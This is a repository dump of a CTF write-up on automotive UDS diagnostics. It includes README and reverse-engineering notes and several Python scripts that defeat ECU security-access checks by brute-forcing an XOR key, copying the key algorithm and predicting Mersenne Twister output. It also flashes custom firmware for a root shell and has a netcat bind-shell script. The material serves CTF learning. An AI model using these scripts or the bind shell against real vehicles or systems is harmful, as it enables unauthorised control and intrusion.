115 |                 "sha256:d7eff0f27edc5afa9e405f7165f85a6d782d308f3b6b9d96016c010597958e63",
116 |                 "sha256:d97d85fa63f315a8bdaba2af9a6a686e0eceab77b3089af45133252618e70884",
117 |                 "sha256:db756e48f9c5c607b5e33dd36b1d5872d0422e960145b08ab0ec7fd420e9d649",
118 |                 "sha256:dc45229747b67ffc441b3de2f3ae5e62877a282ea828a5bdb67883c4ee4a8810",
119 |                 "sha256:e0fc42822278451bc13a2e8626cf2218ba570f27856b536e00cfa53099724828",
120 |                 "sha256:e39c7eb31e3f5b1f88caff88bcff1b7f8334975b46f6ac6e9fc725d829bc35d4",
121 |                 "sha256:e46cd37076971c1040fc8c41273a8b3e2c624ce4f2be3f5dfcb7a430c1d3acc2",
122 |                 "sha256:e5c1502d4ace69a179305abb3f0bb6141cbe4714bc9b31d427329a95acfc8bdd",
123 |                 "sha256:edfe077ab09442d4ef3c52cb1f9dab89bff02f4524afc0acf2d46be17dc479f5",
124 |                 "sha256:effe5406c9bd748a871dbcaf3ac69167c38d72db8c9baf3ff954c344f31c4cbe",
125 |                 "sha256:f0d1e3732768fecb052d90d62b220af62ead5748ac51ef61e7b32c266cac9293",
126 |                 "sha256:f5969baeaea61c97efa706b9b107dcba02784b1601c74ac84f2a532ea079403e",
127 |                 "sha256:f8888e31e3a85943743f8fc15e71536bda1c81d5aa36d014a3c0c44481d7db6e",
128 |                 "sha256:fc52b79d83a3fe3a360902d3f5d79073a993597d48114c29485e9431092905d8"
129 |             ],
130 |             "markers": "python_full_version >= '3.7.0'",
131 |             "version": "==3.3.0"
132 |         },
133 |         "idna": {
134 |             "hashes": [
135 |                 "sha256:814f528e8dead7d329833b91c5faa87d60bf71824cd12a7530b5526063d02cb4",
136 |                 "sha256:90b77e79eaa3eba6de819a0c442c0b4ceefc341a7a2ab77d7562bf49f425c5c2"
137 |             ],
138 |             "markers": "python_version >= '3.5'",
139 |             "version": "==3.4"
140 |         },
141 |         "mersenne-twister-predictor": {
142 |             "hashes": [
143 |                 "sha256:094f556219543146bb8e3b668e6429435e73a849614bb77d0d710bc1e83c052f",
144 |                 "sha256:5169f6b38f709be948a83c3ea75e0330f72ee9f3f525e8cd6e985ae8e141629c"
145 |             ],
146 |             "index": "pypi",
147 |             "version": "==0.0.4"
148 |         },
149 |         "requests": {
150 |             "hashes": [
151 |                 "sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f",
152 |                 "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1"
153 |             ],
154 |             "index": "pypi",
155 |             "markers": "python_version >= '3.7'",
156 |             "version": "==2.31.0"
157 |         },
158 |         "urllib3": {
159 |             "hashes": [
160 |                 "sha256:c97dfde1f7bd43a71c8d2a58e369e9b2bf692d1334ea9f9cae55add7d0dd0f84",
161 |                 "sha256:fdb6d215c776278489906c2f8916e6e7d4f5a9b602ccbcfdf7f016fc8da0596e"
162 |             ],
163 |             "markers": "python_version >= '3.7'",
164 |             "version": "==2.0.7"
165 |         }
166 |     },
167 |     "develop": {}
168 | }
169 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/README.md:
--------------------------------------------------------------------------------
  1 | # User Space Diagnostics
  2 | 
  3 | The [scripts](scripts) directory contains the scripts I used to solve all the challenges in the User
  4 | Space Diagnostics CTF category. Most of these challenges were simple enough to where you can
  5 | understand the solutions simply by reading the source code of these scripts.
  6 | 
  7 | Below, however, are writeups for _Security Access Level 1/3/5_ and _Custom Firmware_.
  8 | 
  9 | ## Security Access Level 1 Writeup
 10 | 
 11 | The challenge description reads:
 12 | 
 13 | > I hear single byte XOR keys are a great security measure, can you prove me wrong?
 14 | 
 15 | From this, we can guess that the key is essentially the seed with each byte xor-ed with a fixed
 16 | 8-bit value. Therefore, we just need to write a script to try each value, and within 256
 17 | authentication attempts, we should find one that produces a valid key.
 18 | 
 19 | ```py
 20 | #!/usr/bin/python3
 21 | 
 22 | from common import *
 23 | 
 24 | def broadcast(x, n):
 25 |     '''Broadcast byte `x` to all bytes in an `n`-byte integer.'''
 26 |     k = 8
 27 |     while n > 1:
 28 |         x  |= (x << k)
 29 |         n >>= 1
 30 |         k <<= 1
 31 |     return x
 32 | 
 33 | s = socket()
 34 | 
 35 | for x in range(256):
 36 |     seed = getseed(s, 1)
 37 |     if not seed:
 38 |         print('Already authenticated to security access level 1')
 39 |         sys.exit(0)
 40 |     data = sendkey(s, 1, p32(u32(seed) ^ broadcast(x, 4)))
 41 |     if data:
 42 |         print(data.decode())
 43 |         break
 44 | ```
 45 | 
 46 | Upon successfully authenticating to security access level 1, we are sent the flag for this
 47 | challenge.
 48 | 
 49 | **Flag:** `bh{whats_wrong_with_static_keys?}`
 50 | 
 51 | ## Security Access Level 3 Writeup
 52 | 
 53 | For security access level 3, we have to dump the firmware from the ECU and reverse engineer it to
 54 | figure out how to generate valid keys.
 55 | 
 56 | The challenge description gives us a hint where to look:
 57 | 
 58 | > You will need to dump the firmware of the application to do this, and further challenges.\
 59 | > As a hint, think of where linux applications get mapped without ASLR?
 60 | 
 61 | Without ASLR, Linux applications are mapped at address `0x400000` in virtual memory. Therefore we
 62 | can send a UDS message with service identifier (SID) 0x23 (Read Memory By Address) to request the
 63 | memory starting at that address. In my scripts, I wrote a function to easily dump up to a certain
 64 | number of bytes from any address. Having already solved this challenge, I can tell you that the
 65 | firmware image is 1 MiB in size, but, without knowing that, you can just enter a really large number
 66 | for the size, and it will stop once it reaches inaccessible memory.
 67 | 
 68 | ```py
 69 | def readmem(s, addr, size, f=None):
 70 |     dump = b''
 71 |     step = READ_MEMORY_MAX_SIZE
 72 |     while step > 0:
 73 |         step = min(step, size)
 74 |         reply = sendrecv(s, bytes([ 0x23, 0x44 ]) + p32(addr) + p32(step))
 75 |         # 0x22 = Conditions Not Correct (e.g. need to authenticate)
 76 |         # 0x31 = Request Out Of Range   (e.g. invalid memory)
 77 |         if reply and reply == b'\x7f\x23\x22':
 78 |             break
 79 |         if reply and reply != b'\x7f\x23\x31':
 80 |             if f:
 81 |                 f.write(reply)
 82 |             else:
 83 |                 dump += reply
 84 |             addr  += step
 85 |             size  -= step
 86 |         else:
 87 |             step //= 2
 88 |     return dump
 89 | ```
 90 | 
 91 | To dump the firmware to a file use the [getmem.py](scripts/getmem.py) script. You will need to
 92 | install the [can-isotp](https://pypi.org/project/can-isotp/) Python module, which you can do with
 93 | the command: `pip install --user can-isotp`. This will take a few minutes to complete, so be
 94 | patient.
 95 | 
 96 | ```
 97 | $ python3 getmem.py 0x400000 1048576 image.bin
 98 | ```
 99 | 
100 | Next, we need to somehow get the firmware dump from Block Harbor's vehicle simulation server to our
101 | local machine so that we can analyze it more easily. For this, I wrote a couple scripts to
102 | [upload](scripts/upload.py) and [download](scripts/download.py) files to/from
103 | [file.io](https://file.io/). To use them, install the Python
104 | [requests](https://pypi.org/project/requests/) module in the same way you installed can-isotp, then
105 | upload the firmware dump from Block Harbor's server, and download it to your local machine.
106 | 
107 | ```
108 | # On Block Habor's vehicle simulation server.
109 | $ python3 upload.py image.bin
110 | key = vLvD4TGDuyzB
111 | ```
112 | 
113 | ```
114 | # On your local machine.
115 | $ python3 download.py vLvD4TGDuyzB image.bin
116 | ```
117 | 
118 | Now, with the firmware dump on our machine, we can analyze it using Ghidra. To prevent this writeup
119 | from getting too long I'll skip over the details on how I reverse engineered the binary, but, if
120 | you're interested in that part, you can read about it [here](Reversing.md). From this point on, I'll
121 | just assume that we have already reversed the firmware image. To use my pre-analyzed file, create a
122 | new project in Ghidra, go to `File -> Import File...`, and select [image.bin.gzf](image.bin.gzf).
123 | 
124 | ![Security Access Level 3 Key Check](security-access-lvl-3-key-check.png)
125 | 
126 | Looking at the switch-statement in the `UDSHandler` function, we can see switch-case 6 seems to
127 | implement the key verification for all security access levels. In particular, lines 143-159 in my
128 | reversed image perform the key check for access level 3. We can see that the key is computed from a
129 | sequence of bitwise operations on the seed. All we have to do now is copy/paste this code into a
130 | script, request a seed from security access level 3, and compute the key.
131 | 
132 | ```py
133 | #!/usr/bin/python3
134 | 
135 | from common import *
136 | 
137 | s = socket()
138 | 
139 | seed = getseed(s, 3)
140 | if not seed:
141 |     print('Already authenticated to security access level 3')
142 |     sys.exit(0)
143 | 
144 | # The key is computed from the following set of bit manipulations.
145 | # See lines 145-149 of the `UDSHandler` function in image.bin.gzf.
146 | key = [ 0 ] * 4
147 | key[1] = ((seed[1] + (seed[2] ^ seed[1]) ^ 0xed) - (seed[2] << 4)) & 0xff
148 | key[0] = ((seed[0] + (seed[3] ^ seed[0]) ^ 0xfe) - (seed[3] << 4)) & 0xff
149 | key[2] = ((seed[2] + (seed[1] ^ seed[3]) ^ 0xfa) - (seed[1] << 4)) & 0xff
150 | key[3] = ((seed[3] + (seed[0] ^ seed[2]) ^ 0xce) - (seed[0] << 4)) & 0xff
151 | data = sendkey(s, 3, bytes(key))
152 | 
153 | print(data.decode())
154 | ```
155 | 
156 | As in the previous challenge, the flag is sent upon successful authentication.
157 | 
158 | **Flag:** `bh{bit_twiddling_is_secure}`
159 | 
160 | ## Security Access Level 5 Writeup
161 | 
162 | For security access level 5, we're given the hint that a pseudo-random number generator (PRNG) is
163 | being used in some way in this challenge, but that we might be able to predict its output. Once
164 | again, we need to do some reversing to figure out how the keys are being generated, which I've
165 | already covered [here](Reversing.md), so I'll skip over that tedium and go straight into the good
166 | stuff.
167 | 
168 | ![Security Access Level 5 Key Check](security-access-lvl-5-key-check.png)
169 | 
170 | As we saw in security access level 3, switch-case 6 in the `UDSHandler` function implements the key
171 | check logic for all security levels. Likewise, switch-case 5 implements the seed generation logic.
172 | On lines 85-92 in the screenshot, above, can see that the seed generated for access levels 1 and 3
173 | is simply the current time in seconds. For level 5, however, the seed is generated using the
174 | [Mersenne Twister](https://en.wikipedia.org/wiki/Mersenne_Twister) PRNG (see lines 77-84).
175 | Furthermore, on lines 107-124 we observe that the corresponding key is generated using the same
176 | PRNG. Therefore, to generate a valid key for this level we need to be able to somehow predict the
177 | next value that the PRNG will return.
178 | 
179 | The Wikipedia article for Mersenne Twister gives us this key information:
180 | 
181 | > [Mersenne Twister] is not cryptographically secure, unless the CryptMT variant is used. The reason
182 | > is that observing a sufficient number of iterations (624 in the case of MT19937, since this is the
183 | > size of the state vector from which future iterations are produced) allows one to predict all
184 | > future iterations.
185 | 
186 | In our case, the firmware is using the MT19937 variant of Mersenne Twister, and is, therefore, not
187 | cryptographically secure. Rather than reinvent the wheel, we can check if there's already some
188 | open-source software that is able to predict the output of MT19937, and, sure enough, someone
189 | already wrote a Python [package](https://github.com/kmyk/mersenne-twister-predictor) to do just
190 | that. Install the package using `pip`, passing in the `--user` flag if you're in Block Harbor's
191 | vehicle simulator, and then we'll write a short script to retrieve 624 seeds from the ECU so that we
192 | can predict the next value that will be output by the PRNG.
193 | 
194 | ```py
195 | #!/usr/bin/python3
196 | 
197 | from mt19937predictor import MT19937Predictor
198 | from common import *
199 | 
200 | N = 32
201 | 
202 | s = socket()
203 | 
204 | # Seed the PRNG. Either 1 or 3 will work ...
205 | getseed(s, 3)
206 | 
207 | # Feed the predictor the first 624 outputs of the PRNG.
208 | predictor = MT19937Predictor()
209 | for _ in range(624):
210 |     seed = getseed(s, 5)
211 |     if not seed:
212 |         print('Already authenticated to security access level 5')
213 |         sys.exit(0)
214 |     predictor.setrandbits(u32(seed), N)
215 | 
216 | # Get the next output, which should be used as the key.
217 | key = predictor.getrandbits(N)
218 | data = sendkey(s, 5, p32(key))
219 | 
220 | print(data.decode())
221 | ```
222 | 
223 | Running this script, we successfully authenticate to security access level 5 and retrieve the flag.
224 | 
225 | **Flag:** `bh{i_really_hate_twister}`
226 | 
227 | ## Custom Firmware
228 | 
229 | The final challenge in this CTF category requires us to flash our own firmware to the ECU. To
230 | transfer data to the ECU, we first send a UDS message with SID 0x34 (Request Download). In this
231 | request we specify the format of the data we are going to send (e.g. encryption vs. no encryption /
232 | compression vs. no compression) and the size of the data. One caveat is that the `UDSHandler`
233 | function expects the last 16 bytes of the data to contain the MD5 checksum of the rest of the data,
234 | so we need to account for that when sending the new firmware image.
235 | 
236 | Upon initiating a software download to the ECU, we should receive a positive response containing the
237 | maximum number of bytes that can be sent in each follow-up Transfer Data message (SID 0x36). The
238 | size we get back is 4095, which is the maximum frame size supported by the ISO-TP protocol.
239 | Therefore, we can send up to 4095 bytes of the firmware image at a time; however, I've found that
240 | the checksum will sometimes fail if the max value is used (probably due to a bug in my code
241 | somewhere). Finally, each Transfer Data message we send must contain an 8-bit sequence number, which
242 | starts at 1 and rolls back over to 0 after sequence number 255.
243 | 
244 | ```py
245 | #!/usr/bin/python3
246 | 
247 | from common import *
248 | import hashlib
249 | 
250 | if len(sys.argv) != 2:
251 |     print('Usage: python flash.py <exe>')
252 |     print('')
253 |     print('  Flash the firmware image saved in <exe> to the ECU.')
254 |     print('')
255 |     print('E.g.   python flash.py shell')
256 |     sys.exit(0)
257 | 
258 | data  = open(sys.argv[1], 'rb').read()
259 | data += hashlib.md5(data).digest()
260 | size  = len(data)
261 | 
262 | s = socket()
263 | 
264 | #
265 | # Initiate a firmware download.
266 | #
267 | # 0x34 = SID (Request Download)
268 | # 0x00 = Data Format ID (no encryption / no compression)
269 | # 0x41 = Address & Length ID (1-byte address / 4-byte size)
270 | # 0x00 = Junk address since it's not used anyways
271 | #
272 | reply = sendrecv(s, bytes([ 0x34, 0x00, 0x41, 0x00 ]) + p32(size))
273 | assert_not_nrc(reply)
274 | 
275 | # Transfer the firmware block-by-block.
276 | seqn = 1
277 | block_size = READ_MEMORY_MAX_SIZE
278 | while size > 0:
279 |     reply = sendrecv(s, bytes([ 0x36, seqn ]) + data[:block_size])
280 |     assert_not_nrc(reply)
281 |     seqn = (seqn + 1) & 0xff
282 |     data = data[block_size:]
283 |     size = size - block_size
284 | 
285 | # Routine a5a5 flashes the new firmware and executes it.
286 | rtctl(s, 0xa5a5, RT_CTL_START, no_return=True)
287 | 
288 | print('Ready!')
289 | ```
290 | 
291 | When all the data (including the checksum) has been sent to the ECU, the final step is to send a
292 | Routine Control (SID 0x31) "start" message for routine `a5a5`, which flashes the new firmware and
293 | executes it. This routine calls the `FlashFirmware` function (in my RE-ed firmware image), where we
294 | can see that the controller just writes the new firmware to `/tmp/firmware`, makes it executable,
295 | and runs it.
296 | 
297 | ![Decompilation of Firmware Flashing Routine](flash-firmware.png)
298 | 
299 | Now, the final step is to make the "firmware" to flash to the ECU. When I originally did this
300 | challenge, I didn't realize that the controller is running in the same container as us, so I thought
301 | that the `vcan0` interface was our only means of communication with whatever firmware we flash to
302 | the ECU. Therefore, I wrote a shell that binds to this interface and communicates over ISO-TP.
303 | Because our firmware will actually be running on the same host (with root privileges), an easier
304 | solution is to just run a shell bound to a local TCP port (see [backdoor.sh](scripts/backdoor.sh)).
305 | Below, however, I will show my original solution, since it works in a wider range of scenarios.
306 | 
307 | The source code for the firmware we will flash to the ECU can be found in [shell.c](shell.c). Harbor
308 | Bay's vehicle simulation server does not have a C/C++ compiler installed, so we will have to compile
309 | the firmware locally and transfer the binary over to the simulator. The [Makefile](Makefile)
310 | contains two Make targets &ndash; `shell` and `small`. The `shell` target creates a static
311 | executable that contains our firmware image. If you have [UPX](https://upx.github.io/) installed,
312 | you can run the `small` target to pack the firmware into a smaller binary that won't take as long to
313 | transfer to the ECU.
314 | 
315 | ```
316 | $ make shell
317 | $ make small
318 | ```
319 | 
320 | Transfer the shell to the simulator (see my [upload](scripts/upload.py) and
321 | [download](scripts/download.py) scripts), authenticate to security access levels 1, 3, and 5, and
322 | flash the firmware. When it finishes, you should see _"Ready!"_ printed to the console. I recommend
323 | opening a second Tmux pane and running `candump vcan0`, so you can see that the script is actually
324 | running and hasn't just hung, and so you can diagnose any errors that may occur. If you do encounter
325 | errors, try running [reset.py](scripts/reset.py), and then attempt to flash the firmware once again.
326 | 
327 | ```
328 | $ python3 unlock.py && python3 flash.py shell
329 | ```
330 | 
331 | If everything went well, our new firmware should be running with root privileges and we will have
332 | access to a shell over the `vcan0` interface. We can connect to it using a simple REPL that I wrote
333 | and which can be found in [tprepl.py](scripts/tprepl.py). The flag for this challenge can be found
334 | in `/root/flags/root.flag`.
335 | 
336 | ```
337 | $ python3 tprepl.py
338 | > whoami
339 | root
340 | 
341 | > ls -lR /root
342 | /root:
343 | total 1060
344 | drwxr-xr-x    1 root     root            23 Jun 27 19:20 flags
345 | -rwxr-xr-x    1 root     root           141 Mar 31  2023 run.sh
346 | -rwxrwxr-x    1 root     root       1078520 Jun 27 19:20 server
347 | 
348 | /root/flags:
349 | total 12
350 | -rw-r--r--    1 root     root            17 Mar 31  2023 rmba.flag
351 | -rw-r--r--    1 root     root            46 Mar 31  2023 root.flag
352 | -rw-r--r--    1 root     root            26 Mar 31  2023 security-level-five.flag
353 | 
354 | >
355 | ```
356 | 
357 | **Flag:** `bh{its_as_easy_as_flashing_your_own_firmware}`
358 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/Reversing.md:
--------------------------------------------------------------------------------
 1 | # Reverse Engineering The UDS Server
 2 | 
 3 | Here, I'll walk you through, at a high level, how I analyzed the UDS server firmware image in
 4 | Ghidra. If you haven't already dumped the firmware and transfered it to your local machine, be sure
 5 | to do that now. Alternatively, you can import [image.bin](image.bin) into Ghidra to get the
 6 | unanalyzed binary. The pre-analyzed image can be found in [image.bin.gzf](image.bin.gzf).
 7 | 
 8 | To start, watch the following video from Block Harbor's YouTube channel. It goes through the initial
 9 | steps of creating a project in Ghidra, importing the firmware image, finding the `UDSHandler`
10 | function (where most of our analysis will take place), and it even walks you through all of the
11 | reversing necessary to solve _Security Access Level 3_.
12 | 
13 | [![UDS Security Access with
14 | Ghidra](http://img.youtube.com/vi/cG4O8_nueUY/0.jpg)](https://www.youtube.com/watch?v=cG4O8_nueUY
15 | "UDS Security Access with Ghidra")
16 | 
17 | Typically, one of the first things I do when I have to reverse engineer something is look for unique
18 | strings in the binary that might lead me to some open source project where I can find at least the
19 | partial source code. Opening up the _Defined Strings_ window, we can see that there are a lot of
20 | strings, but most of them come from GNU Libc, and so are not interesting to us. Among the first
21 | strings, however, you will notice some that begin with "UDS", and below those we find a few
22 | challenge flags.
23 | 
24 | ![Firmware Image Defined Strings](image-defined-strings.png)
25 | 
26 | Searching on Google for one of these strings brings us to this [GitHub
27 | repository](https://github.com/driftregion/iso14229/tree/main), which appears to contain an
28 | implementation of ISO-14229 (i.e. UDS). Looking through the source code in this repository we'll
29 | notice that many of the strings we find in our binary can also be found in
30 | [iso14229.c](https://github.com/driftregion/iso14229/blob/main/iso14229.c) and
31 | [server.c](https://github.com/driftregion/iso14229/blob/main/examples/server.c). Therefore, it's
32 | very likely that much of this code has been compiled into our firmware image, and we can use our
33 | knowledge of the source to more quickly identify which functions do what and to rename/retype
34 | variables to make the decompilation more readable. I won't describe this entire process because it's
35 | very tedious and repetitive, but I'll cover one small example.
36 | 
37 | Let's say we wanted to identify which function in our binary is `main`. There's more than one way to
38 | do this, but in this case we're going to try to identify it using the strings we see in the main
39 | function in the repo's example server. In that function there are two calls to `printf` &ndash; one
40 | that takes as an argument of `"server up, polling . . .\n"` and the other that takes the string,
41 | `"server exiting\n"`. In the _Defined Strings_ window in Ghidra, we can search for either of these
42 | strings and we'll be shown where it is located in the binary.
43 | 
44 | ![Firmware Image Defined Strings Search](image-defined-strings-search.png)
45 | 
46 | At this location in the _Listing_ window, you can see that Ghidra has added annotations to show
47 | cross-references (XREFs) to the string. You can jump to these XREFs by right clicking on the string
48 | and going to `References -> Show References To Address`. This should open up a window with all the
49 | references. Clicking on any them brings you to their location in both the _Listing_ and _Decompile_
50 | windows.
51 | 
52 | ![Firmware Image String Cross References](image-server-up-polling-string.png)
53 | 
54 | This particular string is only referenced from two locations inside a function that Ghidra failed to
55 | find. Navigate to the beginning of the function in the _Listing_ window and hit the `F` key to
56 | define it. In this function, you should see both strings that were present in the example server's
57 | main function. While the decompilation does differ a bit here from what we see in the source code,
58 | we can be fairly sure that this is indeed the same function. Any differences are likely to be
59 | customizations made to the program by Block Harbor for their CTF and, as such, warrant extra
60 | attention, since they could be key to understanding how to solve certain challenges that require
61 | reversing the firmware.
62 | 
63 | During the course of reverse engineering the binary, we'll eventually come across the following
64 | scary-looking function that seems to be important for solving _Security Access Level 5_. The first
65 | thing we should notice in this function are the unique constants, `4357`, `0x9d2c5680`, and
66 | `0xefc60000`. Additionally, the integers `624` and `227` are not too common and do appear in the
67 | decompilation quite a bit. If we take these larger constants and put them into Google, we'll get a
68 | bunch of results for MT19937, which is the most common variant of the Mersenne Twister PRNG. Thus,
69 | without even having to reverse engineer this function, we were able to figure out what it does. If
70 | you want to be extra sure, though, you can search on GitHub for C implementations of MT19937, and
71 | see if the decompilation appears to match any of them. I did that and came across [this
72 | implementation](https://github.com/ESultanik/mtwister/tree/master) that seems to be quite similar.
73 | 
74 | ![Firmware Image PRNG Function](image-prng-function.png)
75 | 
76 | And that's basically everything I did to reverse engineer the UDS server image. I still had to do
77 | some more reversing to solve _Custom Firmware_, but I just used the same process I already outlined
78 | for you, above.
79 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/flash-firmware.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:46c29694ae5a8c5a6ede72fc3807b14b8d205cdc09d201e91ab9e61443efbf96
3 | size 92790
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/image-defined-strings-search.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:4d6475f88ffaf81bfc18bb2fbdfe568f1913cfc39820b31102b41fda91d0c036
3 | size 36021
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/image-defined-strings.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:b84f0163abec23bb458d12641fa4830a18833905a2ab98292ee341f0b62e9c8b
3 | size 325300
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/image-prng-function.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:4ecf81cb45ad131beeb2f005f006129500004f9d1964aad9743a9528523cf364
3 | size 196361
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/image-server-up-polling-string.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:384ec5447446c5908869024a316596d9435dc386db9507686870d806095fa795
3 | size 396557
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/image.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwnalone/bhctf/754978c6749f7e3b5b532e1c2a2f59c282c7314c/user-space-diagnostics/image.bin


--------------------------------------------------------------------------------
/user-space-diagnostics/image.bin.gzf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwnalone/bhctf/754978c6749f7e3b5b532e1c2a2f59c282c7314c/user-space-diagnostics/image.bin.gzf


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/backdoor.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | nc -lnvp 1337 -e /bin/sh
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/common.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import isotp
 4 | import itertools
 5 | import struct
 6 | import sys
 7 | import time
 8 | 
 9 | DEBUG = False
10 | 
11 | DATA_OFFS = {
12 |     0x62 : 3,
13 |     0x63 : 1,
14 |     0x67 : 2,
15 |     0x71 : 4,
16 |     0x74 : 2,
17 |     0x76 : 2,
18 |     0x7f : 0,
19 |     }
20 | 
21 | RT_CTL_START  = 1
22 | RT_CTL_STOP   = 2
23 | RT_CTL_STATUS = 3
24 | 
25 | READ_MEMORY_MAX_SIZE = 0x800
26 | 
27 | p16, u16 = lambda x: struct.pack('>H', x), lambda x: struct.unpack('>H', x)[0]
28 | p32, u32 = lambda x: struct.pack('>I', x), lambda x: struct.unpack('>I', x)[0]
29 | p64, u64 = lambda x: struct.pack('>Q', x), lambda x: struct.unpack('>Q', x)[0]
30 | 
31 | def socket(iface='vcan0', **kwargs):
32 |     timeout = kwargs.get('timeout', 0.1)
33 |     s = isotp.socket(timeout)
34 |     rxid = kwargs.get('rxid', 0x7e8)
35 |     txid = kwargs.get('txid', 0x7e0)
36 |     s.set_ll_opts(**kwargs.get('ll_opts', dict()))
37 |     s.set_fc_opts(**kwargs.get('fc_opts', dict(stmin=5, bs=10)))
38 |     s.bind(iface, isotp.Address(rxid=rxid, txid=txid))
39 |     return s
40 | 
41 | def sendrecv(s, request):
42 |     s.send(request)
43 |     return s.recv()
44 | 
45 | def assert_not_nrc(reply):
46 |     assert(reply and reply[0] != 0x7f)
47 | 
48 | def getdata(reply):
49 |     return reply[DATA_OFFS[reply[0]]:]
50 | 
51 | def readmem(s, addr, size, f=None):
52 |     dump = b''
53 |     step = READ_MEMORY_MAX_SIZE
54 |     while step > 0:
55 |         step = min(step, size)
56 |         reply = sendrecv(s, bytes([ 0x23, 0x44 ]) + p32(addr) + p32(step))
57 |         # 0x22 = Conditions Not Correct (e.g. need to authenticate)
58 |         # 0x31 = Request Out Of Range   (e.g. invalid memory)
59 |         if reply and reply == b'\x7f\x23\x22':
60 |             break
61 |         if reply and reply != b'\x7f\x23\x31':
62 |             if f:
63 |                 f.write(reply)
64 |             else:
65 |                 dump += reply
66 |             addr  += step
67 |             size  -= step
68 |         else:
69 |             step //= 2
70 |     return dump
71 | 
72 | def getseed(s, level):
73 |     request  = bytes([ 0x27, level + 0 ])
74 |     reply = sendrecv(s, request)
75 |     assert_not_nrc(reply)
76 |     data = getdata(reply)
77 |     if data != b'\0\0':
78 |         return data
79 |     else:
80 |         return None
81 | 
82 | def sendkey(s, level, key):
83 |     request  = bytes([ 0x27, level + 1 ])
84 |     request += key
85 |     reply = sendrecv(s, request)
86 |     data = getdata(reply)
87 |     if data and data[0] != 0x7f:
88 |         return data
89 |     else:
90 |         return None
91 | 
92 | def rtctl(s, rid, action, no_return=False):
93 |     reply = sendrecv(s, bytes([ 0x31, action ]) + p16(rid))
94 |     if no_return and not reply:
95 |         return
96 |     assert_not_nrc(reply)
97 |     return getdata(reply)
98 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/download.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | import requests
 4 | import sys
 5 | 
 6 | if len(sys.argv) != 3:
 7 |     print('Usage: ./download.sh <key> <file>')
 8 |     print()
 9 |     print('  Download from file.io the file referenced by <key> and save it to <file>.')
10 |     print()
11 |     print('E.g.   ./download.sh vLvD4TGDuyzB image.bin')
12 |     sys.exit(0)
13 | 
14 | key      = sys.argv[1]
15 | filepath = sys.argv[2]
16 | 
17 | res = requests.get(f'https://file.io/{key}')
18 | with open(filepath, 'wb') as file:
19 |     file.write(res.content)
20 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/flash.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | import hashlib
 5 | 
 6 | if len(sys.argv) != 2:
 7 |     print('Usage: python flash.py <exe>')
 8 |     print('')
 9 |     print('  Flash the firmware image saved in <exe> to the ECU.')
10 |     print('')
11 |     print('E.g.   python flash.py shell')
12 |     sys.exit(0)
13 | 
14 | data  = open(sys.argv[1], 'rb').read()
15 | data += hashlib.md5(data).digest()
16 | size  = len(data)
17 | 
18 | s = socket()
19 | 
20 | #
21 | # Initiate a firmware download.
22 | #
23 | # 0x34 = SID (Request Download)
24 | # 0x00 = Data Format ID (no encryption / no compression)
25 | # 0x41 = Address & Length ID (1-byte address / 4-byte size)
26 | # 0x00 = Junk address since it's not used anyways
27 | #
28 | reply = sendrecv(s, bytes([ 0x34, 0x00, 0x41, 0x00 ]) + p32(size))
29 | assert_not_nrc(reply)
30 | 
31 | # Transfer the firmware block-by-block.
32 | seqn = 1
33 | block_size = READ_MEMORY_MAX_SIZE
34 | while size > 0:
35 |     reply = sendrecv(s, bytes([ 0x36, seqn ]) + data[:block_size])
36 |     assert_not_nrc(reply)
37 |     seqn = (seqn + 1) & 0xff
38 |     data = data[block_size:]
39 |     size = size - block_size
40 | 
41 | # Routine a5a5 flashes the new firmware and executes it.
42 | rtctl(s, 0xa5a5, RT_CTL_START, no_return=True)
43 | 
44 | print('Ready!')
45 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/fuzzer.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | HEX_DIGITS = '0123456789abcdef'
 6 | 
 7 | if len(sys.argv) < 2:
 8 |     print('Usage: python fuzzer.py <fmt...>')
 9 |     print('')
10 |     print('  Fuzz the UDS protocol.')
11 |     print('')
12 |     print('E.g.   python fuzzer.py 22 ?? 0?')
13 |     sys.exit(0)
14 | 
15 | fmt = ' '.join(sys.argv[1:])
16 | cnt = fmt.count('?')
17 | fmt = fmt.replace('?', '{}')
18 | 
19 | s = socket()
20 | 
21 | def spaced(s, n):
22 |     return ' '.join(s[i:i+n] for i in range(0, len(s), n))
23 | 
24 | for nibs in itertools.product(HEX_DIGITS, repeat=cnt):
25 |     request = bytes(map(lambda x: int(x, 16), fmt.format(*nibs).split()))
26 |     reply = sendrecv(s, request)
27 |     print(spaced(request.hex(), 2), ' -> ', spaced(reply.hex(), 2))
28 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/scripts/getmem.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from common import *
 4 | 
 5 | if len(sys.argv) != 3 and len(sys.argv) != 4:
